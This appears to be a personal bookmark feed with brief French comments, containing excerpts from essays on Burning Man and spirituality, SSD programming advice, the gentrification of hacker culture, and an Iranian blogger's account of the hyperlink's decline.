The infusion of Eastern metaphysics into the Western worldview is not necessarily helping, and it may actually be exacerbating our current crisis of values. The popular Buddhist monk Thich Nhat Hanh has recently noted that, within 100 years, the human race may go extinct. His perspective is accurate, according to scientific predictions. He notes, with an accelerated warming cycle like the one that caused the Permian Mass Extinction, 250 million years ago, “another 95 per cent of species will die out, including Homo sapiens. That is why we have to learn to touch eternity with our in breath and out breath. Extinction of species has happened several times. Mass extinction has already happened five times and this one is the sixth. According to the Buddhist tradition there is no birth and no death. After extinction things will reappear in other forms, so you have to breathe very deeply in order to acknowledge the fact that we humans may disappear in just 100 years on earth.”
There is a kind of fatalism to Buddhist thought that doesn’t mesh with our Western approach to reality. Personally, I find myself resonating far more deeply with the Pope’s call for a new spiritual mission that unifies humanity behind protecting life and nature, than I do with Hahn’s view, although I recognize the validity of his statement. Ultimately, there is only the white light of the Void, which certain psychedelic experiences – particularly 5-meo-DMT – experientially confirm. However, there are many other dimensions of being and levels of consciousness we can know and experience. We also possess creative, empathic, and imaginative capacities, which seem be a divine power and dispensation. I think it would be truly amazing if we chose to make use of our deepest abilities to reverse the current direction of our society – to confront the ecological mega-crisis as a true initiation, and offer ourselves as vessels of this transformation.
In order to accomplish this, we would need to overcome our desire for spectacular distraction and insatiable consumption. Burning Man has always drawn its imaginative power from the paradoxes which are essential to it. A huge amount of money, energy, time, and fossil fuel is expended to create conditions which are difficult and force people (except for those wealthy enough to have air-tight sanctuaries built for them) to undergo a certain level of inner confrontation. I think we could further generalize from this, realizing that difficult and uncomfortable conditions are, in fact, necessary for our own development.
I will wrap this up, for now. The main point is there are many crucial lessons to learn from Burning Man: In many ways, it reveals our innate capacities to build a new society, a redesigned society, based on creativity, community, inspiration, and compassion. At the same time, Burning Man has become another spectacle – another cultural phenomenon, in a sense, a cult – and one that sucks a huge amount of energy and time from people who could re-focus their talents and genius on what we must do to escape ecological collapse (building a resilient or regenerative society). The organization, itself, needs to undergo another level of self-analysis and transformation – much like the Catholic Church appears to be doing, under Pope Francis’ lead.
In order to survive what’s coming, we must find a way to awaken a new spiritual impulse in the human community, beginning with our cultural, technocratic, and financial elites. And we don’t have time to waste.
Bibliothèque de NLP sympa (sentiment analysis, tokenisation…)
Basics
A solid-state drives (SSD) is a flash-memory based data storage device. Bits are stored into cells, which exist in three types: 1 bit per cell (single level cell, SLC), 2 bits per cell (multiple level cell, MLC), 3 bits per cell (triple-level cell, TLC).
See also: Section 1.1
Each cell has a maximum number of P/E cycles (Program/Erase), after which the cell is considered defective. This means that NAND-flash memory wears off and has a limited lifespan.
See also: Section 1.1
Testers are humans, therefore not all benchmarks are exempt of errors. Be careful when reading the benchmarks from manufacturers or third parties, and use multiple sources before trusting any numbers. Whenever possible, run your own in-house benchmarking using the specific workload of your system, along with the specific SSD model that you want to use. Finally, make sure you look at the performance metrics that matter most for the system at hand.
See also: Sections 2.2 and 2.3
Pages and blocks
Cells are grouped into a grid, called a block, and blocks are grouped into planes. The smallest unit through which a block can be read or written is a page. Pages cannot be erased individually, only whole blocks can be erased. The size of a NAND-flash page size can vary, and most drive have pages of size 2 KB, 4 KB, 8 KB or 16 KB. Most SSDs have blocks of 128 or 256 pages, which means that the size of a block can vary between 256 KB and 4 MB. For example, the Samsung SSD 840 EVO has blocks of size 2048 KB, and each block contains 256 pages of 8 KB each.
See also: Section 3.2
It is not possible to read less than one page at once. One can of course only request just one byte from the operating system, but a full page will be retrieved in the SSD, forcing a lot more data to be read than necessary.
See also: Section 3.2
When writing to an SSD, writes happen by increments of the page size. So even if a write operation affects only one byte, a whole page will be written anyway. Writing more data than necessary is known as write amplification. Writing to a page is also called “to program” a page.
See also: Section 3.2
A NAND-flash page can be written to only if it is in the “free” state. When data is changed, the content of the page is copied into an internal register, the data is updated, and the new version is stored in a “free” page, an operation called “read-modify-write”. The data is not updated in-place, as the “free” page is a different page than the page that originally contained the data. Once the data is persisted to the drive, the original page is marked as being “stale”, and will remain as such until it is erased.
See also: Section 3.2
Pages cannot be overwritten, and once they become stale, the only way to make them free again is to erase them. However, it is not possible to erase individual pages, and it is only possible to erase whole blocks at once.
See also: Section 3.2
SSD controller and internals
The Flash Translation Layer (FTL) is a component of the SSD controller which maps Logical Block Addresses (LBA) from the host to Physical Block Addresses (PBA) on the drive. Most recent drives implement an approach called “hybrid log-block mapping” or one of its derivatives, which works in a way that is similar to log-structured file systems. This allows random writes to be handled like sequential writes.
See also: Section 4.2
Internally, several levels of parallelism allow to write to several blocks at once into different NAND-flash chips, to what is called a “clustered block”.
See also: Section 6
Because NAND-flash cells are wearing off, one of the main goals of the FTL is to distribute the work among cells as evenly as possible so that blocks will reach their P/E cycle limit and wear off at the same time.
See also: Section 3.4
The garbage collection process in the SSD controller ensures that “stale” pages are erased and restored into a “free” state so that the incoming write commands can be processed.
See also: Section 4.4
Background operations such as garbage collection can impact negatively on foreground operations from the host, especially in the case of a sustained workload of small random writes.
See also: Section 4.4
Access patterns
Avoid writing chunks of data that are below the size of a NAND-flash page to minimize write amplification and prevent read-modify-write operations. The largest size for a page at the moment is 16 KB, therefore it is the value that should be used by default. This size depends on the SSD models and you may need to increase it in the future as SSDs improve.
See also: Sections 3.2 and 3.3
15. Align writes
Align writes on the page size, and write chunks of data that are multiple of the page size.
See also: Sections 3.2 and 3.3
To maximize throughput, whenever possible keep small writes into a buffer in RAM and when the buffer is full, perform a single large write to batch all the small writes.
See also: Sections 3.2 and 3.3
Read performance is a consequence of the write pattern. When a large chunk of data is written at once, it is spread across separate NAND-flash chips. Thus you should write related data in the same page, block, or clustered block, so it can later be read faster with a single I/O request, by taking advantage of the internal parallelism.
See also: Section 7.3
A workload made of a mix of small interleaved reads and writes will prevent the internal caching and readahead mechanism to work properly, and will cause the throughput to drop. It is best to avoid simultaneous reads and writes, and perform them one after the other in large chunks, preferably of the size of the clustered block. For example, if 1000 files have to be updated, you could iterate over the files, doing a read and write on a file and then moving to the next file, but that would be slow. It would be better to reads all 1000 files at once and then write back to those 1000 files at once.
See also: Section 7.4
When some data is no longer needed or need to be deleted, it is better to wait and invalidate it in a large batches in a single operation. This will allow the garbage collector process to handle larger areas at once and will help minimizing internal fragmentation.
See also: Section 4.4
If the writes are small (i.e. below the size of the clustered block), then random writes are slower than sequential writes.
If writes are both multiple of and aligned to the size of a clustered block, the random writes will use all the available levels of internal parallelism, and will perform just as well as sequential writes. For most drives, the clustered block has a size of 16 MB or 32 MB, therefore it is safe to use 32 MB.
See also: Section 7.2
Concurrent random reads cannot fully make use of the readahead mechanism. In addition, multiple Logical Block Addresses may end up on the same chip, not taking advantage or of the internal parallelism. A large read operation will access sequential addresses and will therefore be able to use the readahead buffer if present, and use the internal parallelism. Consequently if the use case allows it, it is better to issue a large read request.
See also: Section 7.3
A large single-threaded write request offers the same throughput as many small concurrent writes, however in terms of latency, a large single write has a better response time than concurrent writes. Therefore, whenever possible, it is best to perform single-threaded large writes.
See also: Section 7.2
Many concurrent small write requests will offer a better throughput than a single small write request. So if the I/O is small and cannot be batched, it is better to use multiple threads.
See also: Section 7.2
Hot data is data that changes frequently, and cold data is data that changes infrequently. If some hot data is stored in the same page as some cold data, the cold data will be copied along every time the hot data is updated in a read-modify-write operation, and will be moved along during garbage collection for wear leveling. Splitting cold and hot data as much as possible into separate pages will make the job of the garbage collector easier.
See also: Section 4.4
Extremely hot data and other high-change metadata should be buffered as much as possible and written to the drive as infrequently as possible.
See also: Section 4.4
System optimizations
The two main host interfaces offered by manufacturers are SATA 3.0 (550 MB/s) and PCI Express 3.0 (1 GB/s per lane, using multiple lanes). Serial Attached SCSI (SAS) is also available for enterprise SSDs. In their latest versions, PCI Express and SAS are faster than SATA, but they are also more expensive.
See also: Section 2.1
A drive can be over-provisioned simply by formatting it to a logical partition capacity smaller than the maximum physical capacity. The remaining space, invisible to the user, will still be visible and used by the SSD controller. Over-provisioning helps the wear leveling mechanisms to cope with the inherent limited lifespan of NAND-flash cells. For workloads in which writes are not so heavy, 10% to 15% of over-provisioning is enough. For workloads of sustained random writes, keeping up to 25% of over-provisioning will improve performance. The over-provisioning will act as a buffer of NAND-flash blocks, helping the garbage collection process to absorb peaks of writes.
See also: Section 5.2
Make sure your kernel and filesystem support the TRIM command. The TRIM command notifies the SSD controller when a block is deleted. The garbage collection process can then erase blocks in background during idle times, preparing the drive to face large writes workloads.
See also: Section 5.1
To ensure that logical writes are truly aligned to the physical memory, you must align the partition to the NAND-flash page size of the drive.
See also: Section 8.1
Conclusion
This summary concludes the “Coding for SSDs” article series. I hope that I was able to convey in an understandable manner what I have learned during my personal research over solid-state drives.
If after reading this series of articles you want to go more in-depth about SSDs, a good first step would be to read some of the publications and articles linked in the reference sections of Part 2 to 5.
Another great resource is the FAST conference (the USENIX Conference on File and Storage Technologies). A lot of excellent research is being presented there every year. I highly recommend their website, a good starting point being the videos and publications for FAST 2013.
Bien intéressant, surtout la partie sur le processus de gentrification (me rappelle un certain Black Mirror…)
−
Any large and alienating infrastructure controlled by a technocratic elite is bound to provoke. In particular, it will nettle those who want to know how it works, those who like the thrill of transgressing, and those who value the principle of open access. Take the US telephone network of the 1960s: a vast array of physical infrastructure dominated by a monopolistic telecoms corporation called AT&T. A young Air Force serviceman named John Draper – aka Captain Crunch – discovered that he could manipulate the rules of tone-dialling systems by using children’s whistles found in Cap’n Crunch cereal boxes. By whistling the correct tone into a telephone handset, he could place free long-distance calls through a chink in the AT&T armour.
Draper was one of the first phone phreakers, a motley crew of jokers bent on exploring and exploiting loopholes in the system to gain free access. Through the eyes of conventional society, such phreakers were just juvenile pranksters and cheapskates. Yet their actions have since been incorporated into the folklore of modern hacker culture. Draper said in a 1995 interview: ‘I was mostly interested in the curiosity of how the phone company worked. I had no real desire to go rip them off and steal phone service.’
But in his book Hackers: Heroes of the Computer Revolution (1984), the US journalist Steven Levy went so far as to put up Draper as an avatar of the ‘true hacker’ spirit. Levy was trying to hone in on principles that he believed constituted a ‘hacker ethic’. One such principle was the ‘hands-on imperative’:
Hackers believe that essential lessons can be learned about the systems – about the world – from taking things apart, seeing how they work, and using this knowledge to create new and even more interesting things.
For all his protestations of innocence, it’s clear that Draper’s curiosity was essentially subversive. It represented a threat to the ordered lines of power within the system. The phreakers were trying to open up information infrastructure, and in doing so they showed a calculated disregard for the authorities that dominated it.
This spirit has carried through into the modern context of the internet, which, after all, consists of computers connected to one another via physical telecommunications infrastructure. The internet promises open access to information and online assembly for individual computer owners. At the same time, it serves as a tool for corporate monopolists and government surveillance. The most widely recognised examples of modern ‘hackers’ are therefore groups such as Anonymous and WikiLeaks. These ‘cypherpunks’ and crypto-anarchists are internet natives. They fight – at least in principle – to protect the privacy of the individual while making power itself as transparent as possible.
Popular now
Why does everyone, of every faith and none, feel immortal?
How yuppies hacked the original hacker ethos
Life without boredom would be a nightmare
This dynamic is not unique to the internet. It plays out in many other spheres of life. Consider the pranksters who mess with rail operators by jamming ticket-barrier gates to keep them open for others. They might not describe themselves as hackers, but they carry an ethic of disdain towards systems that normally allow little agency on the part of ordinary individuals. Such hacker-like subcultures do not necessarily see themselves in political terms. Nevertheless, they share a common tendency towards a rebellious creativity aimed at increasing the agency of underdogs.
Unlike the open uprising of the liberation leader, the hacker impulse expresses itself via a constellation of minor acts of insurrection, often undertaken by individuals, creatively disguised to deprive authorities of the opportunity to retaliate. Once you’re attuned to this, you see hacks everywhere. I see it in capoeira. What is it? A dance? A fight? It is a hack, one that emerged in colonial Brazil as a way for slaves to practise a martial art under the guise of dance. As an approach to rebellion, this echoes the acts of subtle disobedience described by James Scott in Weapons of the Weak: Everyday forms of Peasant Resistance (1986).
Hacking, then, looks like a practice with very deep roots – as primally and originally human as disobedience itself. Which makes it all the more disturbing that hacking itself appears to have been hacked.
Despite the hive-mind connotations of faceless groups such as Anonymous, the archetype of ‘the hacker’ is essentially that of an individual attempting to live an empowered and unalienated life. It is outsider in spirit, seeking empowerment outside the terms set by the mainstream establishment.
Perhaps it’s unwise to essentialise this figure. A range of quite different people can think of themselves in those terms, from the lonely nerd tinkering away on DIY radio in the garage to the investigative journalist immersed in politicised muckraking. It seems safe to say, though, that it’s not very hacker-like to aspire to conventional empowerment, to get a job at a blue-chip company while reading The Seven Habits of Highly Effective People. The hacker impulse is critical. It defies, for example, corporate ambitions.
In my book The Heretic’s Guide to Global Finance (2013), I used this figure of the hacker as a model for readers wishing to challenge the global financial system. The machinery of global capital tends to be seen as complex, disempowering and alienating. The traditional means of contesting it is to build groups – such as Occupy Wall Street – to influence politicians and media to pressure it on your behalf. But this sets up a familiar dynamic: the earnest activist pitted against the entrenched interests of the business elite. Each group defines itself against the other, settling into a stagnant trench warfare. The individual activists frequently end up demoralised, complaining within echo-chambers about their inability to impact ‘the system’. They build an identity based on a kind of downbeat martyrdom, keeping themselves afloat through a fetishised solidarity with others in the same position.
Related video
11 MINUTES
Cyber-utopians believe the web spreads democratic freedom. In practice, it can serve oppressors as much as the oppressed
I was attracted to the hacker archetype because, unlike the straightforward activist who defines himself in direct opposition to existing systems, hackers work obliquely. The hacker is ambiguous, specialising in deviance from established boundaries, including ideological battle lines. It’s a trickster spirit, subversive and hard to pin down. And, arguably, rather than aiming towards some specific reformist end, the hacker spirit is a ‘way of being’, an attitude towards the world.
Take, for example, the urban explorer subculture, chronicled by Bradley Garrett in Explore Everything: Placehacking the City (2013). The search for unusual detours – through a sewer system, for example – is exhilarating because you see things that you’re not supposed to be interested in. Your curiosity takes you to places where you don’t belong. It thus becomes an assertion of individual defiance of social norms. The byproduct of such exploration is pragmatic knowledge, the disruption of standard patterns of thought, and also dealienation – you see what’s behind the interfaces that surround us, coming closer to the reality of our social world.
the hacker modifies the machine to make it self-destruct, or programmes it to frustrate its owners, or opens its usage to those who don’t own it
This is a useful sensibility to cultivate in the face of systems that create psychological, political and economic barriers to access. In the context of a complex system – computer, financial or underground transit – the political divide is always between well-organised, active insiders versus diffuse, passive outsiders. Hackers challenge the binary by seeking access, either by literally ‘cracking’ boundaries – breaking in – or by redefining the lines between those with permission and those without. We might call this appropriation.
A figure of economic power such as a factory owner builds a machine to extend control. The activist Luddite might break it in rebellion. But the hacker explores and then modifies the machine to make it self-destruct, or programmes it to frustrate the purpose of it owners, or opens its usage to those who do not own it. The hacker ethic is therefore a composite. It is not merely exploratory curiosity or rebellious deviance or creative innovation within incumbent systems. It emerges from the intersection of all three.
The word ‘hacker’ came into its own in the age of information technology (IT) and the personal computer. The subtitle of Levy’s seminal book – Heroes of the Computer Revolution – immediately situated hackers as the crusaders of computer geek culture. While some hacker principles he described were broad – such as ‘mistrust authority’ and ‘promote decentralisation’ – others were distinctly IT-centric. ‘You can create art and beauty on a computer,’ read one. ‘All information should be free,’ declared another.
Ever since, most popular representations of the hacker way have followed Levy’s lead. Neal Stephenson’s cyberpunk novel Snow Crash (1992) featured the code-wielding Hiro as the ‘last of the freelance hackers’. The film Hackers (1995) boasted a youthful crew of jargon-rapping, keyboard-hammering computer ninjas. The media stereotype that began to be constructed was of a precocious computer genius using his technological mastery to control events or battle others. It remains popular to this day. In the James Bond film Skyfall (2012), the gadget-master Q is reinvented by the actor Ben Whishaw as a young hacker with a laptop, controlling lines of code with almost superhuman efficiency, as if his brain was wired directly into the computer.
In the hands of a sensationalist media, the ethos of hacking is conflated with the act of cracking computer security
In a sense, then, computers were the making of the hacker, at least as a popular cultural image. But they were also its undoing. If the popular imagination hadn’t chained the hacker figure so forcefully to IT, it’s hard to believe it ever would have been demonised in the way it has been, or that it could have been so effectively defanged.
Computers, and especially the internet, are a primary means of subsistence for many. This understandably increases public anxiety at the bogeyman figure of the criminal ‘hacker’, the dastardly villain who breaches computer security to steal and cause havoc. Never mind that in ‘true’ hacker culture – as found in hackerspaces, maker-labs and open-source communities around the world – the mechanical act of breaking into a computer is just one manifestation of the drive to explore beyond established boundaries. In the hands of a sensationalist media, the ethos of hacking is conflated with the act of cracking computer security. Anyone who does that, regardless of the underlying ethos, is a ‘hacker’. Thus a single manifestation of a single element of the original spirit gets passed off as the whole.
Through the lens of moral panic, a narrative emerges of hackers as a class of computer attack-dogs. Their primary characteristics become aggression and amorality. How to guard against them? How, indeed, to round out the traditional good-versus-evil narrative? Well, naturally, with a class of poacher-turned-gamekeepers. And so we find the construction of ‘white-hat’ hackers, protective and upstanding computer wizards for the public good.
Here is where the second form of corruption begins to emerge. The construct of the ‘good hacker’ has paid off in unexpected ways, because in our computerised world we have also seen the emergence of a huge, aggressively competitive technology industry with a serious innovation obsession. This is the realm of startups, venture capitalists, and shiny corporate research and development departments. And, it is here, in subcultures such as Silicon Valley, that we find a rebel spirit succumbing to perhaps the only force that could destroy it: gentrification.
Gentrification is the process by which nebulous threats are pacified and alchemised into money. A raw form – a rough neighbourhood, indigenous ritual or edgy behaviour such as parkour (or free running) – gets stripped of its otherness and repackaged to suit mainstream sensibilities. The process is repetitive. Desirable, unthreatening elements of the source culture are isolated, formalised and emphasised, while the unsettling elements are scrubbed away.
Key to any gentrification process are successive waves of pioneers who gradually reduce the perceived risk of the form in question. In property gentrification, this starts with the artists and disenchanted dropouts from mainstream society who are drawn to marginalised areas. Despite their countercultural impulses, they always carry with them traces of the dominant culture, whether it be their skin colour or their desire for good coffee. This, in turn, creates the seeds for certain markets to take root. A WiFi coffeeshop appears next to the Somalian community centre. And that, in turn, sends signals back into the mainstream that the area is slightly less alien than it used to be.
If you repeat this cycle enough times, the perceived dangers that keep the property developers and yuppies away gradually erode. Suddenly, the tipping point arrives. Through a myriad of individual actions under no one person’s control, the exotic other suddenly appears within a safe frame: interesting, exciting and cool, but not threatening. It becomes open to a carefree voyeurism, like a tiger being transformed into a zoo animal, and then a picture, and then a tiger-print dress to wear at cocktail parties. Something feels ‘gentrified’ when this shallow aesthetic of tiger takes over from the authentic lived experience of tiger.
This is not just about property. In cosmetics shops on Oxford Street in London you can find beauty products blazoned with pagan earth-mother imagery. Why are symbols of earth-worship found within the citadels of consumerism, printed on products designed to neutralise and control bodily processes? They’ve been gentrified. Pockets of actual paganism do still exist, but in the mainstream such imagery has been thoroughly cleansed of any subversive context.
At the frontiers of gentrification are entire ways of being – lifestyles, subcultures and outlooks that carry rebellious impulses. Rap culture is a case in point: from its ghetto roots, it has crossed over to become a safe ‘thing that white people like’. Gentrification is an enabler of doublethink, a means by which people in positions of relative power can, without contradiction, embrace practices that were formed in resistance to the very things they themselves represent.
We are currently witnessing the gentrification of hacker culture. The countercultural trickster has been pressed into the service of the preppy tech entrepreneur class. It began innocently, no doubt. The association of the hacker ethic with startups might have started with an authentic counter-cultural impulse on the part of outsider nerds tinkering away on websites. But, like all gentrification, the influx into the scene of successive waves of ever less disaffected individuals results in a growing emphasis on the unthreatening elements of hacking over the subversive ones.
Silicon Valley has come to host, on the one hand, a large number of highly educated tech-savvy people who loosely perceive themselves as rebels set against existing modes of doing business. On the other hand, it contains a very large pool of venture capital. The former group jostle for the investor money by explicitly attempting to build network monopolies – such as those created by Facebook and Google – for the purpose of extracting windfall profit for the founders and for the investors that back them, and perhaps, for the large corporates who will buy them out.
the revised definition of the tech startup entrepreneur as a hacker forms part of an emergent system of Silicon Valley doublethink
In this economic context, curiosity, innovation and iterative experimentation are ultimate virtues, and this element of the hacker ethic has proved to be an appealing frame for people to portray their actions within. Traits such as the drive for individual empowerment and the appreciation of clever solutions already resemble the traits of the entrepreneur. In this setting, the hacker attitude of playful troublemaking can be cast in Schumpeterian terms: success-driven innovators seeking to ‘disrupt’ old incumbents within a market in an elite ‘rebellion’.
Thus the emergent tech industry’s definition of ‘hacking’ as quirky-but-edgy innovation by optimistic entrepreneurs with a love of getting things done. Nothing sinister about it: it’s just on-the-fly problem-solving for profit. This gentrified pitch is not just a cool personal narrative. It’s also a useful business construct, helping the tech industry to distinguish itself from the aggressive squares of Wall Street, competing for the same pool of new graduates.
Indeed, the revised definition of the tech startup entrepreneur as a hacker forms part of an emergent system of Silicon Valley doublethink: individual startups portray themselves as ‘underdogs’ while simultaneously being aware of the enormous power and wealth the tech industry they’re a part of wields at a collective level. And so we see a gradual stripping away of the critical connotations of hacking. Who said a hacker can’t be in a position of power? Google cloaks itself in a quirky ‘hacker’ identity, with grown adults playing ping pong on green AstroTurf in the cafeteria, presiding over the company’s overarching agenda of network control.
This doublethink bleeds through into mainstream corporate culture, with the growing institution of the corporate ‘hackathon’. We find financial giants such as Barclays hosting startup accelerators and financial technology hackathons at forums such as the FinTech Innovation Lab in Canary Wharf in London, ostensibly to discover the ‘future of finance’… or at least the future of payment apps that they can buy out. In this context, the hacker ethic is hollowed out and subsumed into the ideology of solutionism, to use a term coined by the Belarusian-born tech critic Evgeny Morozov. It describes the tech-industry vision of the world as a series of problems waiting for (profitable) solutions.
This process of gentrification becomes a war over language. If enough newcomers with media clout use the hollowed-out version of the term, its edge grows dull. You end up with a mere affectation, failing to challenge otherwise conventional aspirations. And before you know it, an earnest Stanford grad is handing me a business card that says, without irony: ‘Founder. Investor. Hacker.’
Any gentrification process inevitably presents two options. Do you abandon the form, leave it to the yuppies and head to the next wild frontier? Or do you attempt to break the cycle, deface the estate-agent signs, and picket outside the wine bar with placards reading ‘Yuppies Go Home’?
The answer to this depends on how much you care. Immigrant neighbourhoods definitely care enough to mobilise real resistance movements to gentrification, but who wants to protect the hacker ethic? For some, the spirit of hacking is stupid and pointless anyway, an individualistic self-help impulse, not an authentic political movement. What does it matter if it gets gentrified?
We need to confront an irony here. Gentrification is a pacification process that takes the wild and puts it in frames. I believe that hacking is the reverse of that, taking the ordered rules of systems and making them fluid and wild again. Where gentrification tries to erect safe fences around things, hacker impulses try to break them down, or redefine them. These are two countervailing forces within human society. The gentrification of hacking is… well, perhaps a perfect hack.
Explore Aeon
Data & Information
Internet & Communication
Subcultures
Or maybe I’ve romanticised it. Maybe hacking has never existed in some raw form to be gentrified. Perhaps it’s always been part of the capitalist commodification processes. Stuff is pulled down and then reordered. Maybe the hackers – like the disenchanted artists and hipsters – are just the vanguard charged with identifying the next profitable investment. Perhaps hacking has always been a contradictory amalgam that combines desire for the unstable and queer with the control impulse of the stable and straight. Certainly in mainstream presentations of hacking – whether the criminal version or the Silicon Valley version – there is a control fetish: the elite coder or entrepreneur sitting at a dashboard manipulating the world, doing mysterious or ‘awesome’ things out of reach of the ordinary person.
I’m going to stake a claim on the word though, and state that the true hacker spirit does not reside at Google, guided by profit targets. The hacker impulse should not just be about redesigning products, or creating ‘solutions’. A hack stripped of anti-conventional intent is not a hack at all. It’s just a piece of business innovation.
The un-gentrified spirit of hacking should be a commons accessible to all. This spirit can be seen in the marginal cracks all around us. It’s in the emergent forms of peer production and DIY culture, in maker-spaces and urban farms. We see it in the expansion of ‘open’ scenes, from open hardware to open biotech, and in the intrigue around 3D printers as a way to extend open-source designs into the realm of manufacture. In a world with increasingly large and unaccountable economic institutions, we need these everyday forms of resistance. Hacking, in my world, is a route to escaping the shackles of the profit-fetish, not a route to profit.
Go home, yuppies.
Méthode de saisie de texte vraiment intéressante/différente
[Déjà posté en Français un peu avant, mais cet article est bien plus complet]
Seven months ago, I sat down at the small table in the kitchen of my 1960s apartment, nestled on the top floor of a building in a vibrant central neighbourhood of Tehran, and I did something I had done thousands of times previously. I opened my laptop and posted to my new blog. This, though, was the first time in six years. And it nearly broke my heart.
A few weeks earlier, I’d been abruptly pardoned and freed from Evin prison in northern Tehran. I had been expecting to spend most of my life in those cells: In November 2008, I’d been sentenced to nearly 20 years in jail, mostly for things I’d written on my blog.
But the moment, when it came, was unexpected. I smoked a cigarette in the kitchen with one of my fellow inmates, and came back to the room I shared with a dozen other men. We were sharing a cup of tea when the voice of the floor announcer — another prisoner — filled all the rooms and corridors. In his flat voice, he announced in Persian: “Dear fellow inmates, the bird of luck has once again sat on one fellow inmate’s shoulders. Mr. Hossein Derakhshan, as of this moment, you are free.”
That evening was the first time that I went out of those doors as a free man. Everything felt new: The chill autumn breeze, the traffic noise from a nearby bridge, the smell, the colors of the city I had lived in for most of my life.
Around me, I noticed a very different Tehran from the one I’d been used to. An influx of new, shamelessly luxurious condos had replaced the charming little houses I was familiar with. New roads, new highways, hordes of invasive SUVs. Large billboards with advertisements for Swiss-made watches and Korean flat screen TVs. Women in colorful scarves and manteaus, men with dyed hair and beards, and hundreds of charming cafes with hip western music and female staff. They were the kinds of changes that creep up on people; the kind you only really notice once normal life gets taken away from you.
Two weeks later, I began writing again. Some friends agreed to let me start a blog as part of their arts magazine. I called it Ketabkhan — it means book-reader in Persian.
Six years was a long time to be in jail, but it’s an entire era online. Writing on the internet itself had not changed, but reading — or, at least, getting things read — had altered dramatically. I’d been told how essential social networks had become while I’d been gone, and so I knew one thing: If I wanted to lure people to see my writing, I had to use social media now.
So I tried to post a link to one of my stories on Facebook. Turns out Facebook didn’t care much. It ended up looking like a boring classified ad. No description. No image. Nothing. It got three likes. Three! That was it.
It became clear to me, right there, that things had changed. I was not equipped to play on this new turf — all my investment and effort had burned up. I was devastated.
Blogs were gold and bloggers were rock stars back in 2008 when I was arrested. At that point, and despite the fact the state was blocking access to my blog from inside Iran, I had an audience of around 20,000 people every day. Everybody I linked to would face a sudden and serious jump in traffic: I could empower or embarrass anyone I wanted.
People used to carefully read my posts and leave lots of relevant comments, and even many of those who strongly disagreed with me still came to read. Other blogs linked to mine to discuss what I was saying. I felt like a king.
The iPhone was a little over a year old by then, but smartphones were still mostly used to make phone calls and send short messages, handle emails, and surf the web. There were no real apps, certainly not how we think of them today. There was no Instagram, no SnapChat, no Viber, no WhatsApp.
Instead, there was the web, and on the web, there were blogs: the best place to find alternative thoughts, news and analysis. They were my life.
It had all started with 9/11. I was in Toronto, and my father had just arrived from Tehran for a visit. We were having breakfast when the second plane hit the World Trade Center. I was puzzled and confused and, looking for insights and explanations, I came across blogs. Once I read a few, I thought: This is it, I should start one, and encourage all Iranians to start blogging as well. So, using Notepad on Windows, I started experimenting. Soon I ended up writing on hoder.com, using Blogger’s publishing platform before Google bought it.
Then, on November 5, 2001, I published a step-to-step guide on how to start a blog. That sparked something that was later called a blogging revolution: Soon, hundreds and thousands of Iranians made it one of the top 5 nations by the number of blogs, and I was proud to have a role in this unprecedented democratization of writing.
Those days, I used to keep a list of all blogs in Persian and, for a while, I was the first person any new blogger in Iran would contact, so they could get on the list. That’s why they called me “the blogfather” in my mid-twenties — it was a silly nickname, but at least it hinted at how much I cared.
Every morning, from my small apartment in downtown Toronto, I opened my computer and took care of the new blogs, helping them gain exposure and audience. It was a diverse crowd — from exiled authors and journalists, female diarists, and technology experts, to local journalists, politicians, clerics, and war veterans — and I always encouraged even more. I invited more religious, and pro-Islamic Republic men and women, people who lived inside Iran, to join and start writing.
The breadth of what was available those days amazed us all. It was partly why I promoted blogging so seriously. I’d left Iran in late 2000 to experience living in the West, and was scared that I was missing all the rapidly emerging trends at home. But reading Iranian blogs in Toronto was the closest experience I could have to sitting in a shared taxi in Tehran and listening to collective conversations between the talkative driver and random passengers.
There’s a story in the Quran that I thought about a lot during my first eight months in solitary confinement. In it, a group of persecuted Christians find refuge in a cave. They, and a dog they have with them, fall into a deep sleep. They wake up under the impression that they’ve taken a nap: In fact, it’s 300 years later. One version of the story tells of how one of them goes out to buy food — and I can only imagine how hungry they must’ve been after 300 years — and discovers that his money is obsolete now, a museum item. That’s when he realizes how long they have actually been absent.
The hyperlink was my currency six years ago. Stemming from the idea of the hypertext, the hyperlink provided a diversity and decentralisation that the real world lacked. The hyperlink represented the open, interconnected spirit of the world wide web — a vision that started with its inventor, Tim Berners-Lee. The hyperlink was a way to abandon centralization — all the links, lines and hierarchies — and replace them with something more distributed, a system of nodes and networks.
Blogs gave form to that spirit of decentralization: They were windows into lives you’d rarely know much about; bridges that connected different lives to each other and thereby changed them. Blogs were cafes where people exchanged diverse ideas on any and every topic you could possibly be interested in. They were Tehran’s taxicabs writ large.
Since I got out of jail, though, I’ve realized how much the hyperlink has been devalued, almost made obsolete.
Nearly every social network now treats a link as just the same as it treats any other object — the same as a photo, or a piece of text — instead of seeing it as a way to make that text richer. You’re encouraged to post one single hyperlink and expose it to a quasi-democratic process of liking and plussing and hearting: Adding several links to a piece of text is usually not allowed. Hyperlinks are objectivized, isolated, stripped of their powers.
At the same time, these social networks tend to treat native text and pictures — things that are directly posted to them — with a lot more respect than those that reside on outside web pages. One photographer friend explained to me how the images he uploads directly to Facebook receive a large number of likes, which in turn means they appear more on other people’s news feeds. On the other hand, when he posts a link to the same picture somewhere outside Facebook — his now-dusty blog, for instance — the images are much less visible to Facebook itself, and therefore get far fewer likes. The cycle reinforces itself.
Some networks, like Twitter, treat hyperlinks a little better. Others, insecure social services, are far more paranoid. Instagram — owned by Facebook — doesn’t allow its audiences to leave whatsoever. You can put up a web address alongside your photos, but it won’t go anywhere. Lots of people start their daily online routine in these cul de sacs of social media, and their journeys end there. Many don’t even realize that they’re using the Internet’s infrastructure when they like an Instagram photograph or leave a comment on a friend’s Facebook video. It’s just an app.
But hyperlinks aren’t just the skeleton of the web: They are its eyes, a path to its soul. And a blind webpage, one without hyperlinks, can’t look or gaze at another webpage — and this has serious consequences for the dynamics of power on the web.
More or less, all theorists have thought of gaze in relation to power, and mostly in a negative sense: the gazer strips the gazed and turns her into a powerless object, devoid of intelligence or agency. But in the world of webpages, gaze functions differently: It is more empowering. When a powerful website — say Google or Facebook — gazes at, or links to, another webpage, it doesn’t just connect it — it brings it into existence; gives it life. Metaphorically, without this empowering gaze, your web page doesn’t breathe. No matter how many links you have placed in a webpage, unless somebody is looking at it, it is actually both dead and blind; and therefore incapable of transferring power to any outside web page.
On the other hand, the most powerful web pages are those that have many eyes upon them. Just like celebrities who draw a kind of power from the millions of human eyes gazing at them any given time, web pages can capture and distribute their power through hyperlinks.
